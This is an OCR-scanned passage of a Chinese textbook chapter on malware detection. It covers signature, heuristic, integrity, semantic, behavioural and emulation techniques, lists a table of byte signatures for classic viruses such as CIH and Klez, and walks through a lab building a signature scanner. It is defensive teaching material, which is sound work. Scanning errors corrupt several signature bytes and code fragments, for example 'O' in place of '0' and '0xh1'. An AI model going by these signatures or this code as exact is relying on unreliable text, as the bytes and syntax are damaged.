反 汇 编 ` 反 编译 等 技术 来 查看 和 分 析 代 码 的 结构 .流程 及 内 容 , 从 而 推导 出 其 执行 的 特性 , 因 
此 检测 方法 是 完全 的 。 常 用 的 静态 检测 技术 包括 特征 码 扫 描 技 术 、 启 发 式 扫描 技术 ,完整 性 
分 析 技 术 、 基 于 语义 的 检测 技术 等 。 

动态 检测 是 指 在 运行 目标 程序 时 ,通过 监测 程序 的 行为 .比较 运行 环境 的 变化 来 确定 目 
标 程 序 是 否 包 含 恶 意 行 为 。 动 态 检 测 是 根据 目标 程序 一 次 或 多 次 执行 的 特性 ,判断 是 否 存 
在 恶意 行为 ,可 以 准确 地 检测 出 异常 属性 ,但 无 法 判定 某 特 定 属性 是 否 一 定 存在 ,因此 是 不 
完全 检测 。 常 用 的 动态 检测 技术 包括 行为 监控 分 析 技 术 、 代 码 仿真 分 析 技 术 等 。 

1. 特征 码 扫描 技术 

特征 码 扫描 技术 是 使 用 最 为 广泛 的 恶意 代码 检测 方法 之 一 。 特 征 码 (Signature) 一 般 
是 指 某 个 或 某 类 恶意 代码 所 具有 的 特征 指令 序列 ,可 以 用 来 区 别 于 正常 代码 或 其 他 恶意 代 
码 。 其 检测 过 程 是 : 通过 分 析 恶 意 代码 样本 ,从 样本 的 代码 中 提取 特征 码 存 和 人 特征 库 中 ; 
当 扫 描 目 标 程序 时 ,将 当前 程序 的 特征 码 与 特征 库 中 的 恶意 代码 特征 进行 对 比 ,判断 是 否 含 
有 特征 数据 ,有 则 认为 是 恶意 代码 。 应 用 该 技术 时 ,需要 不 断 地 对 特征 码 库 进行 扩充 ,一 旦 
捕捉 到 新 的 恶意 代码 ,就 要 提取 相应 特征 码 并 加 入 到 库 中 ,从 而 可 以 发 现 并 查 杀 该 恶意 
代码 。 

特征 码 的 提取 需要 用 到 分 析 恶 意 代码 的 专业 技术 ,如 噪声 引导 自动 产生 分 发 等 ,一 般 
采用 手动 和 自动 方法 来 实现 。 手 动 方法 利用 人 工 方式 对 二 进 制 代码 进行 反 汇 编 , 分 析 反 汇 
编 的 代码 ,发现 非 常规 (正常 程序 中 很 少 使 用 的 ) 的 代码 片段 ,标示 相应 机 器 码 作 为 特征 值 ; 
自动 方法 通过 构造 可 被 感染 的 程序 ,触发 恶意 代码 进行 感染 ,然后 分 析 被 感染 的 程序 ,发 现 
感染 区 域 中 的 相同 部 分 作为 候选 ,然后 在 正常 程序 中 进行 检查 ,选择 误 警 率 最 低 的 一 个 或 几 
个 作为 特征 码 。 特 征 码 的 比 对 一 般 采 用 多 模式 匹配 算法 ,如 Aho-Corasick 自动 机 匹配 算法 
(简称 AC 算法 )、Veldman 算法 .Wu-Manber 算法 等 。 

特征 码 扫描 技术 的 检测 精度 高 ,可 识别 恶意 代码 的 名 称 、 误 警 率 低 ,是 各 种 杀毒 软件 、 防 
护 系统 的 首选 。 由 于 早期 恶意 代码 种 类 少 , 形 态 单一 ,这 种 检测 方法 取得 了 较 好 的 效果 ,只 
要 特征 库 中 存在 该 恶意 代码 的 特征 码 ,就 能 检测 出 来 。 随 着 恶意 代码 种 类 和 数量 的 不 断 增 
加 ,针对 不 同 种 类 和 方式 的 恶意 行为 ,特征 码 扫描 技术 要 求 有 针对 性 地 搜集 和 整理 不 同 版 本 
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的 特征 库 ,并 定期 进行 更 新 和 维护 。 特 征 库 的 不 断 扩 大 不 仅 提高 了 维护 成 本 ,也 降低 了 检测 
效率 。 同 时 ,特征 码 扫描 技术 还 存在 不 能 检查 未 知 和 多 态 性 的 恶意 代码 ,无 法 对 付 隐蔽 性 
(如 自修 改 代码 、 自 产生 代码 ) 恶 意 代码 等 缺点 。 由 于 恶意 代码 采用 了 代码 变形 ,代码 混淆 、 
代码 加 密 、 加 过 技术 等 的 自我 保护 技术 ,甚至 导致 很 多 已 知 的 恶意 代码 也 无 法 通过 特征 码 扫 
描 技 术 检测 出 来 。 

2. 启发 式 扫描 技术 

启发 式 扫 描 技 术 是 对 特征 码 扫描 技术 的 一 种 改进 。 其 思路 是 : 当 提 取出 目标 程序 的 特 
征 后 与 特征 库 中 已 知 恶意 代码 的 特征 做 比较 ,只 要 匹配 程度 达到 给 定 的 阔 值 ,就 认定 该 程序 
包含 恶意 代码 。 这 里 的 特征 包括 已 知 的 植 入 、 隐 藏 、 修 改 注册 表 , 操 纵 中 断 向 量 , 使 用 非常 规 
指令 或 特殊 字符 等 行为 特征 。 例 如 一 般 恶 意 代码 执行 时 都 会 调用 一 些 内 核 函 数 , 而 这 类 调 
用 与 正常 代码 具有 很 大 的 区 别 。 利 用 这 一 原理 ,扫描 程序 时 可 以 提取 出 该 程序 调用 了 哪些 
内 核 丽 数 、. 调 用 的 顺序 和 调用 次 数 等 数据 ,将 其 与 代码 库 中 已 知 的 恶意 代码 对 内 核 函 数 的 调 
用 情况 进行 比较 。 

启发 式 扫描 技术 基于 预定 义 的 扫描 技术 和 判断 规则 来 进行 目标 程序 检测 ,不 仅 能 有 效 
地 检测 出 已 知 的 恶意 代码 ,还 能 识别 出 一 些 变种 、 变 形 和 未 知 的 恶意 代码 。 启 发 式 扫描 技术 
也 存在 误 警 现象 ,有 时 会 将 一 个 正常 的 程序 识别 为 恶意 程序 ,而 且 该 方法 仍旧 基于 特征 的 提 
取 , 所 以 恶意 代码 编写 者 只 要 通过 改变 恶意 代码 的 特征 就 能 轻易 地 吕 开 启发 式 扫描 技术 的 
检测 。 

3. 完整 性 分 析 技 术 

完整 性 分 析 技术 采取 特征 校 验 的 方式 。 在 初始 状态 下 ,通过 特征 算法 如 MD5、SHA1 
等 ,获得 目标 文件 的 特征 哈 希 值 ,并 将 其 保存 为 相应 的 特征 文件 。 当 每 次 使 用 文件 前 或 使 用 
过 程 中 ,定期 检查 其 特征 哈 希 值 是 否 与 原来 保存 的 特征 文件 一 致 ,从 而 发 现 文件 是 否 被 算 
改 。 这 种 方法 既 可 发 现 已 知 恶意 代码 ,又 可 发 现 未 知 恶意 代码 。 

在 实际 检测 过 程 中 ,对 于 Windows 操作 系统 , 一般 只 要 目标 对 象 具 有 合法 的 微软 数字 
签名 就 可 以 直接 略 过 ; 对 于 其 他 文件 , 则 要 进行 特征 值 对 比 。 可 见 , 完 整 性 检查 对 于 系统 文 
件 的 检验 过 程 相对 简单 便捷 ,只 需要 记录 特征 值 即 可 。 

完整 性 分 析 技术 以 散 列 值 的 变化 作为 判断 受到 恶意 代码 影响 的 依据 ,容易 实现 ,能 发 现 
未 知 恶意 代码 ,被 查 文件 的 细微 变化 也 能 发 现 ,保护 能 力 强 ,但 缺点 也 比较 明显 。 恶 意 代 码 
感染 并 非 文 件 内 容 改变 的 唯一 原因 ,文件 内 容 的 改变 有 可 能 是 正常 程序 引起 的 , 某 些 正常 各 
序 的 版 本 更 新 、 口 令 变更 ,运行 参数 修改 等 都 可 能 导致 散 列 值 的 变化 ,从 而 引发 误 判 。 其 他 
缺点 还 包括 必须 预先 记录 正常 态 的 特征 哈 希 值 . 不 能 识别 恶意 代码 名 称 . 程 序 执行 速度 变 慢 
等 。 完 整 性 分 析 技术 往往 作为 一 种 辅助 手段 得 到 广泛 应 用 ,主要 用 于 系统 安全 扫描 。 

4. 基于 语义 的 检测 技术 

基于 语义 的 恶意 代码 检测 对 已 知 恶意 代码 和 目标 程序 进行 代码 分 析 , 得 到 程序 的 语义 
特征 ,通过 对 已 知 恶意 代码 和 目标 程序 的 内 部 属性 关系 如 控制 流 、 数 据 流程 序 依赖 关系 等 
进行 分 析 , 找 出 两 者 问 是 否 匹 配 ,从 而 判断 目标 程序 是 否 包含 恶意 代码 。 
主要 缺点 是 对 程序 代码 的 分 析 依赖 于 反 汇 编 代码 的 精度 ,另外 判断 子 图 同 构 问 题 是 
NP 完全 问题 ,因此 在 匹配 算法 上 需要 进一步 处 理 。 
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5. 行为 监控 分 析 技 术 

行为 监控 分 析 技 术 是 指 利用 系统 监控 工具 审查 目标 程序 运行 时 引发 的 系统 环境 变化 ， 
根据 其 行为 对 系统 所 产生 的 影响 来 判断 目标 程序 是 否 具有 恶意 。 

恶意 代码 在 运行 过 程 中 通常 会 对 系统 造成 一 定 的 影响 : 有 些 恶 意 代码 为 了 保证 自己 的 
自 启动 功能 和 进程 隐藏 的 功能 ,通常 会 修改 系统 注册 表 和 系统 文件 ,或 者 会 修改 系统 配置 。 
有 些 亚 意 代码 为 了 进行 网 络 传播 或 把 收集 到 的 信息 传递 给 远 端 控制 者 ,会 在 本 地 开启 一 些 
网 络 端口 或 网 络 服务 等 。 行 为 监控 分 析 通 过 收集 系统 变化 来 进行 恶意 代码 分 析 , 分 析 方 法 
相对 简单 ,效果 明显 ,已 经 成 为 恶意 代码 检测 的 常用 手段 之 一 。 

行为 监控 检测 属于 异常 检测 的 范畴 ,一 般 包 含 数据 收集 .解释 分 析 、 行 为 匹配 3 个 模块 ， 
其 核心 是 如 何 有 效 地 实现 数据 收集 。 按 照 监 控 行 为 类 型 ,行为 监控 分 析 技术 可 分 为 网 络 行 
为 分 析 和 主机 行为 分 析 。 按 照 监控 对 象 的 不 同 ,行为 监控 分 析 技术 又 可 分 为 文件 系统 监控 、 
进程 监控 、 网 络 监控 注册 表 监 控 等 。 

目前 可 用 于 行为 监控 分 析 的 工具 有 很 多 。 例 如 ,FileMon 是 一 种 常用 的 文件 监控 工具 ， 
能 记录 与 文件 相关 的 许多 操作 行为 (如 打开 , 读 写 、 删 除 和 保存 等 );; Process Explorer 是 一 
个 专业 的 进程 监控 程序 ,可 以 看 到 进程 的 优先 级 、 环 境 变量 ,还 能 监控 进程 装载 过 程 和 注册 
表 键 值 的 变化 情况 ; TCPview、Nmap 和 Nessus 则 是 常用 的 网 络 监控 工具 。 

6. 代码 仿真 分 析 技术 

代码 仿真 分 析 是 将 目标 程序 运行 在 一 个 可 控 的 模拟 环境 (如 虚拟 机 、 沙 盒 ) 中 ,通过 跟踪 
目标 程序 执行 过 程 使 用 的 系统 函数 .指令 特征 等 进行 恶意 代码 检测 分 析 。 在 程序 运行 时 进 
行动 态 追 踪 , 能 够 高 效 地 捕捉 到 异常 行为 .但 恶意 代码 发 作 后 ,会 对 系统 造成 一 定 的 影响 ,其 
至 可 能 引起 不 必要 的 损失 ,因此 利用 代码 仿真 分 析 技 术 ,在 模拟 环境 下 运行 目标 程序 , 既 可 
以 在 动态 环境 下 对 目标 程序 进行 有 效 跟 踪 ,也 可 以 把 可 能 造成 的 恶意 代码 影响 限制 在 模拟 
环境 内 ,是 一 个 很 好 的 选择 。 


10.4.2 恶意 代码 的 检测 方法 


学 习 了 恶意 代码 检测 原理 后 ,就 要 在 该 原理 的 指导 下 来 检测 恶意 代码 。 通 常 恶 意 代码 
的 检测 方法 有 两 类 : 手工 检测 和 自动 检测 。 

1. 手工 检测 

手工 检测 是 指 通过 一 些 工具 软件 (Debug、UltraEdit、EditPlus、SoftICE、TRW、OllyDbg 
等 ) 进 行 恶意 代码 的 检测 。 这 种 方法 比较 复杂 ,需要 检测 者 熟悉 机 器 指令 和 操作 系统 ,因而 
不 可 能 普及 。 它 的 基本 过 程 是 利用 一 些 工 具 软 件 , 对 易 遭 受 恶意 代码 攻击 和 修改 的 内 存 及 
磁盘 的 有 关 部 分 进行 检查 ,通过 和 正常 情况 下 的 状态 进行 对 比分 析 , 来 判断 是 否 被 恶意 代码 
感染 。 用 这 种 方法 检测 恶意 代码 费时 费力 ,但 可 以 剖析 新 恶意 代码 .并 检测 一 些 自动 检测 工 
具 不 认识 的 新 恶意 代码 。 

2. 自动 检测 

自动 检测 是 指 通 过 一 些 自动 诊断 软件 来 判断 系统 是 否 染 毒 的 方法 。 自 动 检测 方法 比较 
简单 ,一 般 用 户 都 可 以 进行 ,但 需要 较 好 的 诊断 软件 。 这 种 方法 可 方便 地 检测 大 量 的 恶意 代 
码 , 但 是 ,自动 检测 工具 只 能 识别 已 知 恶意 代码 ,而 且 自 动 检测 工具 的 发 展 总 是 滞后 于 恶意 
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代码 的 发 展 ,所 以 自动 检测 工具 只 能 识别 部 分 未 知 恶意 代码 。 

从 这 两 种 方法 的 定义 我 们 可 以 看 出 它们 的 区 别 : 手工 检测 方法 操作 难度 大 并 且 技 术 复 
杂 , 它 需要 操作 人 员 具 有 一 定 的 软件 分 析 经 验 及 对 操作 系统 有 深入 的 了 解 ; 而 自动 检测 方 
法 操作 简单 ,使 用 方便 ,适合 一 般 的 计算 机 用 户 学 习 使 用 。 但 是 ,由 于 恶意 代码 的 种 类 较 多 ， 
程序 复杂 ,再 加 上 不 断 地 出 现 恶意 代码 的 变种 ,因此 自动 检测 方法 不 可 能 检测 所 有 未 知 的 恶 
意 代 码 。 在 出 现 一 种 新 型 的 恶意 代码 时 ,如 果 现 有 的 各 种 检测 工具 无 法 检测 这 种 恶意 代码 ， 
则 只 能 用 手工 方法 进行 恶意 代码 的 检测 。 其 实 ,自动 检测 也 是 在 手工 检测 成 功 的 基础 上 把 
手工 检测 方法 程序 化 后 所 得 的 。 因 此 ,可 以 说 ,手工 检测 恶意 代码 是 最 基本 、 最 有 力 的 工具 。 


10.4.3 自动 检测 程序 核心 部 件 


由 于 恶意 代码 入 侵 事 件 层出不穷 ,几乎 每 一 台 计 算 机 上 都 安装 了 不 同 品牌 的 查 杀 软件 。 
一 般 用 户 会 认为 查 杀 软件 是 非常 神秘 的 。 那 么 查 杀 软件 是 根据 什么 原理 来 工作 的 呢 ? 下 面 
主要 讨论 自动 诊断 恶意 代码 的 最 简单 方法 一 一 特征 码 扫描 法 。 基 于 特征 码 扫描 法 的 自动 诊 
断 程 序 至 少 要 包括 两 部 分 : 特征 码 (Pattern/Signature) 库 和 扫描 引擎 (Scan Engine) 。 

1. 特征 码 

所 谓 特征 码 ,其实 可 以 说 成 恶意 代码 的 “指纹 ”, 当 安全 软件 公司 收集 到 一 个 新 的 恶意 代 
码 时 ,就 可 以 从 这 个 恶意 代码 程序 中 截取 一 小 段 独一无二 并 且 是 以 表示 这 个 恶意 代码 的 二 
进 制 代码 (Binary Code) ,作为 查 杀 程序 辨认 此 恶意 代码 的 依据 ,而 这 段 独一无二 的 二 进 制 
代码 就 是 所 谓 的 特征 码 。 二 进 制 代码 是 计算 机 的 最 基本 语言 (机 器 码 ) ,在 计算 机 中 所 有 可 
以 执行 的 程序 (如 EXE、COM) 几 乎 都 是 由 二 进 制程 序 代码 所 组 成 的 。 对 于 宏 病 毒 来 说 , 虽 
然 它 只 是 包含 在 Word 文档 中 的 宏 ,可 是 它 的 宏 程 序 也 是 以 二 进 制 代 码 的 方式 存在 于 Word 
文档 中 的 。 特 征 码 是 如 何 产生 的 ? 其 实 特征 码 必 须 依照 各 种 不 同 格 式 的 档案 及 恶意 代码 感 
染 的 方式 来 取得 。 例 如 ,如 果 有 一 个 Windows 的 程序 被 恶意 代码 感染 ,那么 安全 软件 公司 
就 必须 先 研究 出 Windows 文件 存储 的 格式 ,看 看 Windows 文件 是 怎么 被 操作 系统 执行 ,以 
便 找 出 Windows 程序 的 进入 点 ,因为 恶意 代码 就 是 藏身 在 这 个 地 方 来 取得 控制 权 并 进行 传 
染 及 破坏 。 知 道 恶 意 代码 程序 在 一 个 Windows 文件 中 所 存在 的 位 置 之 后 ,就 可 以 从 这 个 区 
域 中 来 找 出 一 段 特殊 的 恶意 代码 特征 码 供 扫描 引擎 使 用 。 

在 安全 软件 公司 中 都 有 技术 人 员 专 门 在 为 各 种 不 同类 型 的 恶意 代码 提取 特征 码 , 可 是 
当 恶 意 代 码 越 来 越 多 ,要 找 出 每 一 个 恶意 代码 都 独一无二 的 特征 码 可 能 就 不 太 容易 了 ,有 时 
候 甚 至 这 些 特征 码 还 会 误 判 到 一 些 不 是 恶意 代码 的 正常 文件 ,所 以 通常 安全 软件 公司 在 将 
恶意 代码 特征 码 送 给 客户 前 都 必须 先 经 过 一 番 严 格 的 测试 , 才 放 在 Internet 上 供 使 用 者 自 
由 下 载 。 

特征 码 扫描 法 是 用 每 一 个 恶意 代码 体 含 有 的 特征 码 (Signature) 对 被 检测 的 对 象 进行 
扫描 。 如 果 在 被 检测 对 象 内 部 发 现 了 某 一 个 特征 码 , 就 表明 发 现 了 该 特征 码 所 代表 的 恶意 
代码 。 国 外 将 这 种 按 搜索 法 工作 的 恶意 代码 扫描 软件 称 为 Scanner。 

恶意 代码 扫描 软件 由 两 部 分 组 成 : 一 部 分 是 恶意 代码 特征 码 库 , 含 有 经 过 特别 选 定 的 
各 种 恶意 代码 的 特征 码 ; 另 一 部 分 是 利用 该 特征 码 库 进 行 扫描 的 扫描 程序 。 扫 描 程 序 能 识 
别 的 恶意 代码 的 数目 完全 取决 于 特征 码 库 内 所 含 恶意 代码 的 种 类 有 和 多少。 显而易见 , 库 中 
恶意 代码 的 特征 码 种 类 越 多 ,扫描 程序 能 认 出 的 恶意 代码 就 越 多 。 
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恶意 代码 特征 码 的 选择 是 非常 重要 的 。 短 小 的 恶意 代码 只 有 一 百 多 字 节 ,而 较 长 的 代 
码 串 有 上 百 KB 字 节 的 。 如 果 随 意 从 恶意 代码 体内 选 一 段 字符 串 作 为 其 特征 码 ,可 能 在 不 
同 的 环境 中 ,该 特征 码 并 不 真正 具有 代表 性 ,不 能 用 于 将 该 特征 码 所 对 应 的 恶意 代码 检查 出 
来 。 选 择 特征 码 的 规则 有 以 下 几 点 。 

(1) 特征 码 不 应 含有 恶意 代码 的 数据 区 ,数据 区 是 会 经 常 变 化 的 。 

(2) 特征 码 足以 将 该 恶意 代码 区 别 于 其 他 恶意 代码 和 该 恶意 代码 的 其 他 变种 。 

(3) 在 保持 唯一 性 的 前 提 下 ,应 尽量 使 特征 码 长 度 短 些 ,以 减少 时 间 和 空间 开销 。 

(4) 特征 码 必 须 能 将 恶意 代码 与 正常 的 正常 程序 区 分 开 。 

选择 恰当 的 特征 码 是 非常 困难 的 ,这 也 是 杀毒 软件 的 精华 所 在 。 一 般 情况 下 ,特征 
码 是 由 连续 的 若干 个 字 节 组 成 的 串 ,但 是 有 些 扫描 程序 采用 的 是 可 变 长 串 , 即 在 串 中 包 
含 通配符 字 节 。 扫 描 程 序 使 用 这 种 特征 码 时 ,需要 对 其 中 的 通配符 做 特殊 处 理 。 例 如 ， 
给 定 特征 码 为 “D6 82 00 22 ? 45 AC”, 则 “D6 82 00 22 27 45 AC” 和 “D6 82 00 22 9C 45 
AC” 都 能 被 识别 出 来 。 又 如 ,给 定 特 征 码 为 “D6 82 ? [?] [?] [?] 45 CB”, 则 可 以 匹配 
“D6 82 00 45 CB”“D6 82 00 11 45 CB” 和 “D6 82 00 11 22 45 CB”。 但 不 匹配 “D6 82 00 
11 22 33 44 45 CB”, 因 为 82 和 45 之 间 的 子 串 已 超过 4 个 字 节 。 常 见 恶意 代码 的 特征 码 
如 表 10-1 所 示 。 


表 10-1 常见 恶意 代码 的 特征 码 


恶意 代码 名 称 特 征 码 

AIDS 42 E8 EF FF 8E D8 2D CC 

Bad boy 2E FF 36 27 01 OE 1F2E FF 26 25 01 

CIH 55 8D 44 24 F8 33 DB 64 87 03 

Christmas BC CA 0A FC E8 03 00 E9 7D 05 50 51 56 BE59 00 B9 1C 09 90 D1 E9 E1 

DBASE 80 FC 6C 74 EA 80 FC 58 74 E5 

Do-Nothing 72 04 50 EB 07 90 B4 4C 

EDV #3 75 1C 80 FE 01 75 17 5B 07 1F 58 83 

Friday. 432 50 CB 8C C8 8E D8 E8 06 00 E8 D9 00 E9 04 01 06 

Ghost 90 EA 59 EC 00 90 90 

Ita Vir 48 EB D8 1C D3 95 13 93 1B D3 97 

Klez Al 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 

Lisbon 8B 11 79 3D 0A 00 2E 89 

MIXI/Icelandic 43 81 3F 45 58 75 Fl B8 00 43 

Ping Pong VB Al F5 81 A3 F5 7D 8B 36 F9 81 

Stoned/ Marijuana 00 53 51 52 06 56 57 

Taiwan 8A OE 95 00 81 El FE 00 BA 9E 

TYPO Boot 24 13 55 AA 

Vcomm 0A 95 4C B3 93 47 E1 60 B4 
69 6C 20 36 20 73 65 74 74 65 6D 62 72 65 00 00 5C 64 6C 6C 6D 67 72 64 
61 74 00 47 65 73 F9 20 61 69 20 64 69 73 63 65 70 6F 6C 69 20 27 49 6E 20 

Worm/ Borzella 
76 65 72 69 74 EO0 2C 20 69 6E 20 76 65 72 69 74 E0 20 76 69 20 64 69 63 
6F 20 79 3D 

YanKee Doodle 35 CD 21 8B F3 8C C7 
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2. 扫描 引擎 

扫描 引擎 可 以 说 是 查 杀 软 件 中 最 为 精华 的 部 分 。 当 使 用 一 套 软件 时 ,不 论 它 的 界面 是 
否 精美 ,操作 是 否 简便 ,功能 是 否 完善 ,这 些 都 不 足以 证 明 一 套 查 杀 软 件 的 好 坏 。 事 实 上 , 当 
用 户 操作 查 杀 软 件 去 扫描 某 一 个 磁盘 驱动 器 或 目录 时 , 它 其 实 是 把 这 个 磁盘 驱动 器 或 目录 
下 的 文件 一 一 送 进 扫描 引擎 来 进行 扫描 :也 就 是 其 所 呈现 的 漂亮 界面 其 实 只 是 一 个 用 户 接 
口 (User Interface,UDI) ,真正 影响 扫描 速度 及 检测 准确 率 的 因素 就 是 扫描 引擎 ,扫描 引擎 是 
一 个 没有 界面 .没有 包装 的 核心 程序 , 它 被 放 在 查 杀 软件 所 安装 的 目录 之 下 ,就 好 像 汽车 引 
擎 平常 是 无 法 直接 看 见 的 ,可 是 它 却 是 影响 汽车 性 能 最 主要 的 关键 。 有 了 特征 码 , 有 了 扫描 
引擎 ,再 配合 一 个 精美 的 操作 界面 ,就 成 了 市 场 上 所 看 到 的 查 杀 软件 。 

绝 大 多 数 的 人 都 以 为 安装 了 一 套 查 杀 软 件 之 后 ,就 可 以 从 此 高 枕 无 忧 了 ,这 是 一 个 绝对 
错误 的 观念 ,因为 恶意 代码 的 种 类 及 形态 一 直 在 改变 ,新 恶意 代码 也 每 天 不 断 地 被 产生 ,如 
果 不 经 常 更 换 最 新 的 特征 码 以 及 扫描 引擎 ,再 强大 的 查 杀 软件 也 会 有 失灵 的 一 天 。 举 个 最 
明显 的 例子 来 说 ,在 还 没有 出 现 宏 病 毒 以 前 ,全 世界 没有 任何 一 家 查 杀 软件 厂商 支持 宏 病毒 
扫描 能 力 ,如 果 还 在 沿用 数 年 前 的 查 杀 软件 ,就 无 法 侦 测 到 宏 病 毒 了 ,所 以 必须 使 用 能 扫 到 
宏 病 毒 的 特征 码 及 支持 宏 病 毒 的 扫描 引擎 。 

若 只 单单 更 换 特征 码 或 扫描 引擎 还 是 不 够 的 ,因为 旧 的 特征 码 文件 可 能 还 没 加 入 宏 病 
毒 的 特征 码 , 或 者 是 旧 的 扫描 引擎 根本 不 支持 对 某 种 文件 进行 查 杀 ,因此 必须 同步 更 新 特征 
码 和 扫描 引擎 才能 有 效 发 挥 效 果 。 由 于 特征 码 和 扫描 引擎 是 杀毒 工作 中 相当 重要 的 一 环 ， 
目前 一 些 比较 大 的 安全 软件 厂商 都 有 将 特征 码 及 扫描 引擎 放 在 网 站 上 供 人 免费 下 载 。 


10.4.4 恶意 代码 查找 实验 


【实验 目的 】 

掌握 恶意 代码 查找 基本 原理 。 

【实验 环境 】 

(1) Windows XP 操作 系统 。 

(2) Visual Studio 6. 0 应 用 程序 。 

【实验 步 又】 

(1) 从 下 载 文 件 中 复制 实验 文件 到 实验 计算 机 上 (源码 位 置 : 本 书 配 套 素材 目录 
\Experiment\ Chiklez) 。 

(2) 该 目录 下 的 DontAllow 是 防 删除 功能 的 动态 链接 库 ,事先 编译 该 程序 。 

(3) 编译 根 目 录 下 的 程序 ,生成 病毒 查找 应 用 程序 。 

(4) 运行 VirRemv. exe, 根 据 按钮 指示 操作 ,体验 病毒 查找 功能 。 

【实验 源码 】 

VirScan 是 一 个 简单 的 示例 程序 ,该 程序 演示 了 根据 病毒 特征 码 发 现 特定 病毒 (CIH 和 
Klez) 的 方法 。VirScan 是 基于 MFC 实现 的 。 

VirScan 从 程序 入 口 点 开始 查找 病毒 特征 码 , 入 口 点 是 根据 PE 文件 格式 实现 的 (如 果 
读者 忘 了 这 些 知 识 ,请 翻阅 前 面 的 章节 )。 程 序 实现 了 对 目录 的 递归 搜索 ,默认 情况 下 ,查找 
PE 类 型 文件 的 病毒 。 由 于 Klez 病毒 会 卸载 杀毒 引擎 ,其 破坏 力 更 加 强大 。 为 了 防止 被 病 
毒 破坏 ,VirScan 用 一 个 DLL 来 保持 扫描 引擎 的 活动 状态 ,以 达到 保护 扫描 引擎 的 目的 。 
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在 程序 人 口 点 获取 了 部 分 标记 作为 病毒 特征 码 。 对 于 CIH 病毒 来 说 ， 


地 改变 程序 人口 点 处 的 标记 ,因此 这 种 获得 病毒 特征 码 的 方法 是 没有 问题 的 。 但 是 对 于 


Klez 来 说 就 不 太 合适 了 。Klez 病毒 会 动态 地 改变 程序 人 口 点 处 的 前 
VirScan 跳 过 了 前 16 个 字 节 。 


于 它 不 会 动态 


6 个 字 节 ,所 以 


在 介绍 查 毒 程序 以 前 ,首先 构造 一 个 简单 的 病毒 库 virus. pattern。 为 了 方便 ,该 文件 采 


用 ASCII 码 制作 ,用 notepad. exe 打开 它 就 可 以 看 到 下 面 的 内 容 。 病 毒 库 
结构 如 下 : 


Klez = {A1l, 00, 00, 00, 00, 50, 64, 89, 25, 00, 00, 00, 00, 83, EC, 58, 53, 
Cih = {55, 8D, 44, 24, F8, 33, DB, 64, 87, 03}; 


1. 初始 化 


virus. pattern 的 


56, 57, 89}; 


在 初始 化 阶段 要 完成 两 件 事情 : 首先 ,从 病毒 库 中 读 取 各 个 病毒 的 特征 码 , 并 转换 成 十 


六 进 制 ; 其 次 ,保护 VirScan 程序 ,防止 被 病毒 删除 。 


读 取 病毒 特征 码 的 过 程 比较 简单 ,这 里 就 不 做 详细 介绍 了 。 经 过 转换 后 的 格式 如 下 : 


unsigned char KlezSignature[ ] = {0xh1，0x00，0x00，0x00，0x00，0x50，0x64，0x89，0x25，0x00， 


Ox00, Ox00, Ox00, 0x83, OxEC, Ox58, 0x53, Ox56, Ox57, 0x89}; 


unsigned char CihSignature[ ] = {0x55, Ox8D, Ox44, 0x24, OxF8, 0x33, OxDB, 0x64, 0x87, 0x03}; 


用 于 保护 VirScan 程序 的 过 程 如 下 。 


首先 ,编写 一 个 普通 的 DLL, 该 DLL 将 导出 一 个 名 称 为 DontAllowForDeletion 的 函 


数 。 该 函数 的 功能 是 装载 VirScan 程序 。 其 代码 如 下 : 


BOOL WINAPI DontAllowForDeletion(LPSTR Str) 
{ 


HANDLE hFile; 

if((hFile= CreateFile(Str, GENERIC READ, FILE SHARE READ, NULL, OPEN_EXISTING, 
FILE_ATTRIBUTE_READONLY, NULL)) == INVALID HANDLE VALUE){ 
return FALSE; 

return TRUE; 


y 


其 次 ,在 VirScan 启动 时 ,调用 DLL 的 导出 函数 ,实现 对 VirScan 程序 的 保护 。 其 实现 


代码 如 下 : 


DontAllowDeletion = (DLLEUNC * )GetProcAddress(hLib, "DontAllowForDeletion"); 


DontAllowDeletion(TmpPath) ); 
//TmpPath 为 VirScan 在 系统 中 的 物理 位 置 


2. 文件 查找 模块 


文件 查找 模块 的 功能 是 在 指定 的 目录 下 递归 搜索 特定 类 型 (扩展 名 ) 文 件 , 然 后 再 调用 
病毒 查找 模块 来 判断 该 文件 是 否 染 毒 。 该 模块 是 病毒 查找 模块 的 上 层 调用 模块 。 它 的 实现 


代码 参考 源码 。 
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3. 病毒 查找 模块 
病毒 查找 模块 是 扫描 引擎 的 核心 模块 。 该 模块 的 功能 是 对 某 个 输入 文件 进行 病毒 查 
找 ,查找 的 依据 是 病毒 的 特征 码 。 该 模块 的 实现 代码 参考 源码 。 


10.5 恶意 代码 的 清除 


在 10.4 节 分 析 了 一 个 根据 恶意 代码 特征 码 查找 恶意 代码 的 程序 实例 ,其 原理 是 在 文件 
中 查找 恶意 代码 特征 码 并 逐一 核对 。 清 除 恶意 代码 比 查找 恶意 代码 在 原理 上 要 难得 多 。 如 
果 要 清除 恶意 代码 ,不 仅 需要 知道 恶意 代码 的 特征 码 , 还 需要 知道 恶意 代码 的 感染 方式 ,以 
及 详细 的 感染 步骤 。 


10.5.1 恶意 代码 清除 的 原理 


将 感染 恶意 代码 的 文件 中 的 恶意 代码 模块 摘除 ,并 使 之 恢复 为 可 以 正常 使 用 的 文件 的 
过 程 称 为 恶意 代码 清除 (杀毒 )。 我 们 知道 ,并 不 是 所 有 的 染 毒 文件 都 可 以 安全 地 清除 掉 恶 
意 代 码 ,也 不 是 所 有 文件 在 清除 恶意 代码 后 都 能 恢复 正常 。 由 于 清除 方法 不 正确 ,在 对 染 毒 
文件 进行 清除 时 ,有 可 能 将 文件 破坏 。 有 些 时 候 , 只 有 做 低级 格式 化 才能 彻底 清除 恶意 代 
码 , 但 却 会 丢失 大 量 文 件 和 数据 。 不 论 采用 手工 还 是 使 用 专业 杀毒 软件 清除 恶意 代码 ,都 是 
危险 的 ,有 了 时 可 能 出 现 “ 不 治 病 ” 反 而 “ 赔 命 ”的 后 果 , 将 有 用 的 文件 彻底 破坏 了 。 

根据 恶意 代码 编制 原理 的 不 同 ,恶意 代码 清除 的 原理 也 是 不 同 的 ,大 概 可 以 分 为 引导 区 
病毒 ,文件 型 病毒 .蠕虫 和 木马 等 的 清除 原理 。 本 节 主 要 以 引导 型 病毒 ,文件 型 病毒 为 例 介 
绍 恶意 代码 清除 原理 。 

1. 引导 型 病毒 的 清除 原理 


引导 型 病毒 是 一 种 只 能 在 DOS 系统 发 挥 作用 的 陈旧 恶意 代码 。 引 导 区 病毒 感染 时 的 
攻击 部 位 和 破坏 行为 包括 以 下 几 方面 。 

(1) 硬盘 主 引 导 扇 区 。 

